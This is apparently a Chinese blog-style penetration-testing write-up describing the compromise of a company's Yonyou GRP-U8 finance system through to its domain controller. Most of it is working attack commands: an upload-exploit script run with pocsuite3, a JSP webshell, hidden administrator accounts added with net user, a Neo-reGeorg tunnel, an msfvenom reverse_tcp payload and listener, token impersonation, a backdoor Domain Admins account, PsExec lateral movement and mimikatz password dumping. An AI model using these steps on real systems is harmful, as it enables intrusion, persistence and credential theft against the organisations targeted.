0x01 靶标信息
免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
只供对已授权的目标使用测试,对未授权目标的测试作者不承担责任,均由使用本人自行承担。
文章正文
0x01 靶标信息
本次靶标如下
漏洞目标:http://x.x.x.x:8000/
公司官网:http://xxx.com/
涉及单位:XX有限责任公司
单位地址:xxxxxxxxxxxxxxxxxxx
0x02 开始渗透
步骤一:检测抓取XXX在网络中的资产分布,检测到以下地址为其行政事业财务管理系统界面(那肯定有戏了阿)
步骤二:目录扫描检测是否存在漏洞发现用友 GRP-U8 UploadFileData接口并下载以下项目执行命令进行漏洞检测....发现存在漏洞
#项目地址
https://github.com/xanszZZ/YY_upfile
#安装pocsuite3
pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple pocsuite3
#进行漏洞检测
pocsuite -r YY_upfile.py -f file.txt
步骤三:使用攻击脚本攻击成功后访问以下页面进行漏洞验证....查看是否上传存在漏洞即可尝试获取网站后门
http://X.X.X.X:8000/R9iPortal/debugg.jsp
步骤四:在以上项目的攻击脚本中将测试代码data变量中的值修改为一句话木马进而执行以下命令获取网站后门.....
#攻击命令
pocsuite -r YY_upfile2.py -f file.txt
步骤五:以执行成功后拼接访问以下地址为网站后门地址...进行验证;返回空白页面说名成功并使用哥斯拉客户端连接验证 Bingo!
http://X.X.X.X:8000/R9iPortal/U8date.jsp //哥斯拉默认连接
步骤六:在使用哥斯拉连接上网站后门进行简单的信息收集如下...
whoami #nt authority\system
hostname #8888
ipconfig /all #域8888.com 内172.16.0.8
systeminfo #Microsoft Windows Server 2008 R2 Enterprise VMware, Inc
tasklist /svc #无
net time /domain #8888.8888.com //查询时间服务器 172.16.0.1
netstat -an #RDP:3389
net user pts$ 123admiN /add #成功
net localgroup administrators pts$ /add #成功
net user k 123admi /add /doamin #失败
net group "Domain Users" /domain #无4k用户
net user pts$ 123admiN /add #隐藏的系统账户
net localgroup administrators pts$ /add
步骤七:判断出存在域环境直接执行上线...
步骤八:由于只有内网IP地址且已经开启RDP服务,故需要在此搭建通信隧道进行远程桌面连接,部署Neo-Regorg并访问,本地执行命令与边界主机建立通信隧道....
#Neo-regorg服务端地址
http://X.X.X.X:8000/showstatus.jsp
#通信隧道建立命令
python3 neoreg.py -k 123123 -u http://X.X.X.X:8000/showstatus.jsp
步骤九:开启SockCap64软件并配置好代理进行测试...成功
步骤十:在Sockcap64上开启远程桌面连接并输入以上步骤中创建的本地账号(系统后门)进行连接...
步骤十一:开始进行内网信息收集....执行以下命令并获取信息
#CS执行
logonpasswords //username:Administrator password:[email protected]
shell net group "Domain Computers" /domain //255台主机
#哥斯拉中查询敏感信息
C:/Users/Administrator.8888/ //文件修改日期2022年12月7日
步骤十二:尝试使用读取出的本地账号与明文密码对域控进行PTH攻击且失败无果.....存在以下攻击思路!
进一步扫描获取更多的信息,但是动静会很大~暂且备用
本地机器上存在域管理员的用户文件夹~可优先尝试窃取该用户的会话令牌
步骤十三:选择第二个攻击思路!直接在哥斯拉中反弹MSF的Shell....失败;生成MSF上传执行上线....
#哥斯拉操作
payload windows/meterpreter/reverse_tcp //反弹失败
payload java/meterpreter/reverse_tcp //反弹成功 无法获取会话令牌
#生成木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=6666 -f exe -o Sysupdate.exe
#MSFCONSOLE
msfconsole //启动MSF的漏洞攻击框架
use exploit/multi/handler //调用木马监听模块
set payload windows/meterpreter/reverse_tcp //设置木马服务端类型
set lhost 10.0.20.3 //设置监听的地址
set lport 6666 //设置监听的端口
run //启动当前的监听
步骤十四:开始窃取域管理员的会话令牌并验证...
#Meterpreter操作
use incognito //进入incognito模块
list_tokens -u //列出令牌
impersonate_token "WUHANKQ\Administrator" //选择要窃取的账号
#验证权限
shell
chcp 65001 //活动代码页字符为UTF-8编码
whoami
步骤十五:尝试在Meterpreter中创建域控管理员账户...失败;在CMD下执行创建成功;
#Meterpreter操作
add_user username password -h 域控IP
add_group_user "Domain Admins" username -h 域控IP
add_user k 123admiN -h 172.16.X.X
add_group_user "Domain Admins" k -h 172.16.X.X
#目标CMD下操作
chcp 65001
net user k 123admiN /add /domain
net group "Domain Admins" k /add /domain
net group "Domain Admins" /domain
net group "Administrators" k /add /domain #失败
步骤十六:已经获取域管理后门账号尝试在边界主机上对域控进行远程登陆....失败;
username:8888\k
password:123adm
步骤十七:出现以下问题,网上给出的解决方案需要在目标终端中执行以下命令【没卵用】...尝试横向移动到域控
#解决命令
sfc /scannow //无果
#横向移动命令
net use \\172.16.X.X /u:8888\k 123adm //建立IPC$连接
net use //查看已经建立的IPC$连接
PsExec64.exe \\172.16.X.X -s cmd.exe -accepteula //反弹cmd
dir \\172.16.0.20\c$ //查看默认的C盘共享
copy SystemUpdate.exe \\172.16.X.X\c$ //拷贝本地CS马执行上线
步骤十八:在域控上执行命令查询存在的防护软件为卡巴斯基,这里对mimikatz进行源码免杀上传执行...
#AV查询
shell tasklist /svc
avp.exe-> Kaspersky
avp.exe-> Kaspersky
#明文抓取
privilege::debug
sekurlsa::logonpasswords
成功拿下域控
技术交流
知识星球
致力于红蓝对抗,实战攻防,星球不定时更新内外网攻防渗透技巧,以及最新学习研究成果等。常态化更新最新安全动态。专题更新奇技淫巧小Tips及实战案例。
涉及方向包括Web渗透、免杀绕过、内网攻防、代码审计、应急响应、云安全。星球中已发布 200+ 安全资源,针对网络安全成员的普遍水平,并为星友提供了教程、工具、POC&EXP以及各种学习笔记等等。
交流群
关注公众号回复“加群”,添加Z2OBot 小K自动拉你加入Z2O安全攻防交流群分享更多好东西。
关注我们
关注福利:
回复“app" 获取 app渗透和app抓包教程
回复“渗透字典" 获取 针对一些字典重新划分处理,收集了几个密码管理字典生成器用来扩展更多字典的仓库。
回复“书籍" 获取 网络安全相关经典书籍电子版pdf
回复“资料" 获取 网络安全、渗透测试相关资料文档
往期文章